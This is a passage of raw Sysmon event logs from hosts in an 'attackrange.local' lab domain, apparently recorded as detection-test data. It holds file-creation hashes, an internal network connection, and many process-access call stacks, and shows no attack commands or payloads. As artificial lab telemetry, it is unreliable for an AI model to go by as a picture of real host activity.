Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1584B50C5B7851FA55E94825EBBDC8AE,SHA256=AB5FFA1E87259C6C1546CC7F0EE1755AE0663535C50F60C19ED39015417CBF58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:01.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CFAAA1CBCADD6211DA9103BF23B82D6,SHA256=61EF907CA0B93B51AED1EFC8ECFFAC954C5D5BE6AD071499773BC919CE35F11D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:02.941{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC0478E60A576C90A31AD4A0EFA935C4,SHA256=1336F4D19949604C7CF75073774AE596907067CF7A23B847E994E5408F3BCFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.689{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sil.bat@2021-07-12_074455MD5=71FF16ED78441729EC535AC06F91AFCA,SHA256=2F989756F7E17CF8E3D535EDED7B3FB532D41CDA7A547D69E3D2193901BECCAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.659{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50920-false10.0.1.12-8000- 10341000x80000000000000001046293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.436{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\
Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:02.374{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001046277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
